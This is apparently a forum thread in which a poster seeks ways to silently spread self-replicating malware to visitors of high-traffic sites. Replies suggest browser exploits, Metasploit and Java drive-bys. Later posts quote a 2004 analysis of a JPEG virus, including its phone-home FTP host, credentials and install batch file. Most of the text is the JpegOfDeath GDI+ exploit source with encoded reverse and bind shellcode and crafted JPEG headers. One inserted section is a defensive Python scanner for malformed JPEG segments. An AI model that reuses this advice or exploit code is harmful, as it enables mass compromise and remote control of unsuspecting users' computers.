Hey, just some background: I'm a software engineer / web application developer for a company. I've been programming for 10+ years and professionally for about 4. I am strong when it comes to web development, programming, graphics, hardware/microcontrollers, and networking, but lacking in the security realm. I give this background so nobody thinks I'm some 16-year-old kid wanting to be a 1337 haxor and disregards my question due to ignorance.
If one put up a website that replicated an existing site, is there an exploit that has been found to push a file download to the client machine without any notification? I've heard there is a way with JavaScript and temporary internet files, but I have not found any info on that.
If not, what is the best way to transfer a file to a client machine without using social engineering, normal downloads, file binding and other very straightforward attacks? I have some web servers; the servers can support almost any server-side language: PHP, ASP, ASP.NET, Ruby, etc.
It depends solely on which browser/version the client is running. Almost all browsers are sandboxed, making this task infinitely more complex. Moreover, most companies (Google, Mozilla, etc.) offer a bounty for critical backdoors and release a patch within days if not hours. Nearly all such backdoors are done through vulnerabilities in how a browser handles embedded apps (Java apps, Flash, Adobe Reader, etc.). This isn't to say finding a backdoor is impossible. Google ran a Chrome hackathon a few months back and a 20-something-year-old CS grad found a backdoor bypassing the sandbox, which netted him 10k cash and a job with Google.
All critical vulnerabilities for past browser releases are well documented. If you have a specific target in mind, your best bet would be to grab the header data of the target. Chances are, if he or she is not a "techy", they will not be running the latest version of their browser. With this information, you can search for known backdoors present in unpatched versions of that browser. Chances are you can even find working code or pre-existing apps to execute an attack. If they're running, for example, the most recent Chrome distro fully patched, then you may be SOL.
Acquaint yourself with Metasploit or similar pen testing software. Also, there are tons of applications that access internet data (therefore acting as an impromptu browser). Most of these are not sandboxed, and finding a backdoor is much more likely than finding one within a top 5 browser.
ActiveX used to be the way to go quite a few years back when you wanted to do something like that, but those days are pretty much long gone. These days people are a bit more in tune with what they do on their computers, so it's slightly more time-consuming to trick people. Though clickjacking is still a big thing these days, and it's a little bit harder to fight against. Might try looking into that?
Hmm, clickjacking? I see what it is, but I can't find a very good example of what I would need it for. I could put up a fake product to download a file they are not expecting, but that is obvious.
Are you going down the lines of having a user click a link which runs some JavaScript, which in turn will run a download and automatically accept it? I'm not too clear on how this would work for my "needs". I want to spread a file I created to as many computers as possible to form a network. It is self-replicating, so it can spread through flash drives and any exe file, but as a developer I've always written these types of files and never ones capable of spreading to a specific group of people. Maybe there's a better way to spread this? I'm sure if I append the code to an image it can't be executed locally on a remote machine, so I'm kinda stumped on how to make this file spread itself. I can code whatever is needed; I'm just lacking ideas for methods of getting it out there.
As I said, I have access to servers, high-traffic web pages, in-depth programming abilities, email lists, and large IP databases.
Is there a better way? Or a way to send files based on IP and open ports? I heard there may be a way to do this?
Most exploits have a very low infection rate; Blackhole (in its prime anyway) got 15% tops, but they were mostly shit slaves. You're better off trying to find a better exploit in other programs than browsers.
I find that Java drive-bys still hit a LOT of users, depending on the targeted audience. Yes, they get a pop-up for you to let Java run, but if it is a site where they expect Java to run, you will still get a decent percentage of people allowing it.
Then there are many more ways to 'put' a file onto their computer without their knowledge that it's you, and without physical access. Doing it with a website is... going to be much trickier.
And using an executable file is going to make things exponentially more difficult, especially when you can embed malicious software in such files as Adobe PDFs. Think outside the box, but with the info you've given there's not much I can tell you.
Seems too outdated; it's a remote JPEG exploit to allow the attacker to connect back to the infected machine once opened in Explorer. I think this was patched in XP SP2. Also, you changed it, and for the life of me I can't read that hex; every output I produce is unreadable. And I can't compile that since I can't read the shellscript or header array, and I sure as hell don't want some random script executing on my system.
This code is very simple except for the character arrays. Every time I output them I am getting unreadable text, and I'd like to see what commands it is performing and what it is actually exploiting. Any ideas?
Also, my target audience will be whoever visits the site. It is possible to get them to download an exe, but I'd need to bind it, and I'd like to write my own binder if that is the case. And a Java drive-by would be ideal; I will look into that. Any info I may need would be favorable and I would appreciate it greatly!
I need this on a website because I do not want to infect a single user, or even a dozen. I have a whole demographic of people and am looking for maybe a 2-10% infection rate of whoever visits the site. I have advertising, servers, domain names and everything I need; I just don't have the exploit I need yet, but the file is being written now in C++ and I'm going to bind it with another app I wrote if it has to be downloaded as an executable.
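As an added example, not from any poster in this thread: the exploit header quoted later in the thread carries a JPEG comment (COM) marker whose 16-bit length field is 1, which is why djpeg reports "Comment, length -1" for the file (the decoder subtracts the two length bytes and underflows). The scanner below walks a JPEG's marker segments and rejects any file declaring a segment length below 2, the malformed-input check a mail or web gateway can apply; both sample inputs are constructed here and contain no image data or shellcode.

```python
# Added example (not from any poster in this thread): a JPEG marker walker
# that flags the malformed-comment condition behind the 2004 GDI+ JPEG bug.
# Every JPEG segment after a marker carries a 16-bit big-endian length that
# counts its own two bytes, so a declared length below 2 is never valid; the
# vulnerable decoder subtracted 2 and underflowed, which is why djpeg prints
# "Comment, length -1" for the exploit file. A gateway scanner that rejects
# such files blocks this family regardless of the payload attached.
import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))
MARKER_NAMES = {0xC0: "SOF0", 0xC4: "DHT", 0xDA: "SOS", 0xDB: "DQT", 0xFE: "COM"}


def marker_name(marker):
    if marker in MARKER_NAMES:
        return MARKER_NAMES[marker]
    if 0xE0 <= marker <= 0xEF:
        return "APP%d" % (marker - 0xE0)
    return "0x%02X" % marker


def walk_markers(data):
    """Yield (offset, marker, declared_length) for each segment up to SOS.

    declared_length is None for standalone markers. Walking stops at SOS
    (entropy-coded data follows) or at the first segment whose length is
    below 2, because there is no safe way to skip past such a segment.
    """
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        start = pos
        while pos < len(data) and data[pos] == 0xFF:  # skip fill bytes
            pos += 1
        if pos >= len(data):
            break
        marker = data[pos]
        pos += 1
        if marker in STANDALONE:
            yield start, marker, None
            if marker == EOI:
                return
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated segment header at offset %d" % start)
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        yield start, marker, length
        if marker == SOS or length < 2:
            return
        pos += length


def find_malformed_segments(data):
    """Return [(offset, marker, length)] for segments declaring a length < 2."""
    return [(off, m, ln) for off, m, ln in walk_markers(data)
            if ln is not None and ln < 2]


def report(data):
    """Human-readable verdict lines for a scanner log."""
    bad = find_malformed_segments(data)
    if not bad:
        return ["ok: all segment lengths >= 2 before SOS"]
    return ["offset %d: %s declares length %d (< 2): malformed, reject file"
            % (off, marker_name(m), ln) for off, m, ln in bad]


# Constructed samples. BENIGN is a minimal JFIF header with a 5-byte comment.
# MALFORMED mirrors the segment layout of the exploit header quoted in this
# thread (JFIF APP0, "Ducky" APP12, Adobe APP14) followed by a COM marker
# whose length field is 1; no image data or shellcode is included.
JFIF_APP0 = b"\xFF\xE0\x00\x10JFIF\x00\x01\x02\x00\x00\x64\x00\x64\x00\x00"
BENIGN = (b"\xFF\xD8" + JFIF_APP0
          + b"\xFF\xFE\x00\x07hello"
          + b"\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00")
MALFORMED = (b"\xFF\xD8" + JFIF_APP0
             + b"\xFF\xEC\x00\x11Ducky\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x00"
             + b"\xFF\xEE\x00\x0EAdobe\x00\x64\xC0\x00\x00\x00\x01"
             + b"\xFF\xFE\x00\x01")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name)
        for line in report(sample):
            print("  " + line)
```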
Even though it's true it's old (2004), I tested it on my own machine just a few weeks ago with WinXP SP3 and it worked like a charm. I set up a quick FTP server and put calc.exe in the home folder, edited the JPEG's download URL, and as soon as I hovered my mouse over either the .jpeg itself or even entered the folder it was in, it immediately downloaded and ran calc.exe on my system in the background, right through my router and updated Avast scanner/AntiMalware. Lots of times they say they've patched something but they really haven't.
Code:
jpeg virus in the wild?!
UPDATE: To check to see if you have been infected by this virus, look for a directory named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it.
UPDATE: We have packet logs at http://easynews.com/virus/ THIS VIRUS IS NASTY!
If you don't know what a jpeg virus is, check out:
http://news.google.com/news?q=jpeg+virus
Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com. It paged my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for the second hit.
Once this JPEG overflowed GDI+, it phoned home, connected to an FTP site and downloaded almost 2 megs of stuff. It installs a trojan that installs itself as a service.
It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you can work on a remote computer exactly as if you were right there at its keyboard."
It phones home to the same IP that is in the usenet post headers. Then it seems to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users were logged in!)
It downloads these files:
and executes 'execute.bat', which looks like:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server
it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d
Here is the data:
The isolated file is here (BE CAREFUL - DON'T SUE ME FOR DAMAGE, I'LL COUNTER-SUE!):
http://easynews.com/virus/virus-jpeg.zip
md5: b7e7a5703a722558b6a170be5c43b90d
crc32:a3e0f71e
size: 4098 bytes
Here is the first message header:
And here is the second header:
Here is a 'djpeg' output:
djpeg -debug b7e7a5703a722558b6a170be5c43b90d0a3e0f71e.jpg > /dev/null
Independent JPEG Group's DJPEG, version 6b 27-Mar-1998
Copyright (C) 1998, Thomas G. Lane
Start of Image
JFIF APP0 marker: version 1.02, density 100x100 0
APP12, length 15:
Ducky\000\001\000\004\000\000\000
\000\000
Adobe APP14 marker: version 100, flags 0xc000 0x0000, transform 1
Comment, length -1:
Corrupt JPEG data: 130 extraneous bytes before marker 0xc0
Start Of Frame 0xc0: width=555, height=857, components=3
Component 1: 2hx2v q=0
Component 2: 1hx1v q=1
Component 3: 1hx1v q=1
Define Huffman Table 0x00
Define Huffman Table 0x01
Define Huffman Table 0x10
Define Huffman Table 0x11
Start Of Scan: 3 components
Component 1: dc=0 ac=0
Component 2: dc=1 ac=1
Component 3: dc=1 ac=1
Ss=0, Se=63, Ah=0, Al=0
Quantization table 0x00 was not defined
Here is a 'strings' output:
-- godzilla
EASYNEWS ROCKS!
ps: sample exploit code:
/***************************************************************
*
* GDI+ JPEG Remote Exploit
* By John Bissell A.K.A. HighT1mes
*
* Exploit Name:
* =============
* JpegOfDeath.c v0.5
*
* Date Exploit Released:
* ======================
* Sep, 23, 2004
*
* Description:
* ============
* Exploit based on FoToZ exploit but kicks the exploit up
* a notch by making it have reverse connectback as well as
* bind features that will work with all NT based OS's.
* WinNT, WinXP, Win2K, Win2003, etc... Thank you FoToz for
* helping get a grip on the situation. I actually had got
* bind jpeg exploit working earlier but I could only
* trigger from OllyDbg due to the heap dynamically changing...
*
* If anyone who uses this exploit has used my recent AIM
* remote exploit then you will have a good idea already of how
* to use this exploit correctly.
*
* Through my limited testing I have found on a unpatched
* XP SP1 system that if you click the exploit jpeg file
* in Windows Explorer then you will be hacked. I know there
* are more attack points you can take advantage of if you
* look for them.. So say someone goes on any web browser
* and they decide to save your jpeg and then later open it
* in explorer.exe then they will be attacked.. or maybe they
* got a email that has a good filename attachment title to
* it like "daisey fuentes porn pic.jpg" well then they
* want to see it so they save it to there harddrive and open
* the pic in explorer.exe and game over. You just have to
* test and get creative. The reason this is version 0.5 is
* because I know rundll32.exe is MAJORALLY exploitable and I know
* that would make this exploit far more powerful if I
* figured that part out.. I have already exploited it
* personally myself but I need to run some more tests to
* make things final for everyone... On another side note
* for the people out there who think you can only be affected
* through viewing or downloading a jpeg attachment.. you're
* dead wrong.. All the attacker has to do is simply change
* image extension from .jpg to .bmp or .tif or whatever
* and stupid Windows will still treat the file as a JPEG :-p...
* Also the fact is this vulnerability is exploitable
* without the victim clicking a link... For instance you
* send them the image with a 1,1 width,height and then'
* they can't see it in Outlook Express, so there like
* man this image has a cool name so I'll try to open the
* attachment, then there FUCKED... Well ok they have to
* click in a round-about-way.. but I'm sure if you're
* creative enough with all those MS features you can figure
* something out ;-)
*
* I'll most likely be putting out another version of this
* exploit (more dangerous) once more testing has been done. So
* I encourage everyone out there to download SP2, patch your
* Windows systems, etc... Of course this won't be a
* cure all solution :-/
*
* Note:
* =====
* If someone wants to take advantage of the bind mode of
* attack in this exploit you will need to set up a script
* on a web server to check everyone who downloads the
* jpeg exploit file and then connect back to them on the
* port you wanted to use with the bind attack... One of
* the reasons I decided to keep the bind shellcode option
* in here is because sometimes as you people know a
* firewall will be more restrictive on outbound connections
* and there are times where a bind attack will do just right
* if the reverse connect attack won't work... On ANOTHER
* note you can also rename your jpeg file extension to
* something like a .bmp or .tif and dumb Windows program's
* (most of them) won't give give a shit and try to load the
* jpeg anyways... You can easily trick unsuspecting people
* this way.. which is pretty much everyone.. right??
*
* Greetings:
* ==========
* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
* Nick Fitzgerald, Adam Nance (where are you?),
* Santa Barbara, Jenna Jameson, John Kerry, so1o,
* Computer Security Industry, Rom Hackers, My chihuahuas
* (Rocky, Sailor, and Penny)...
*
*
* Disclaimer:
* ===========
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* Look out for a better version of this exploit in a few days.. perhaps...
*
********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
/* Exploit Data... */
char reverse_shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
char bind_shellcode[] =
"\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
char setNOPs1[] =
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char setNOPs2[] =
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char header2[] =
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
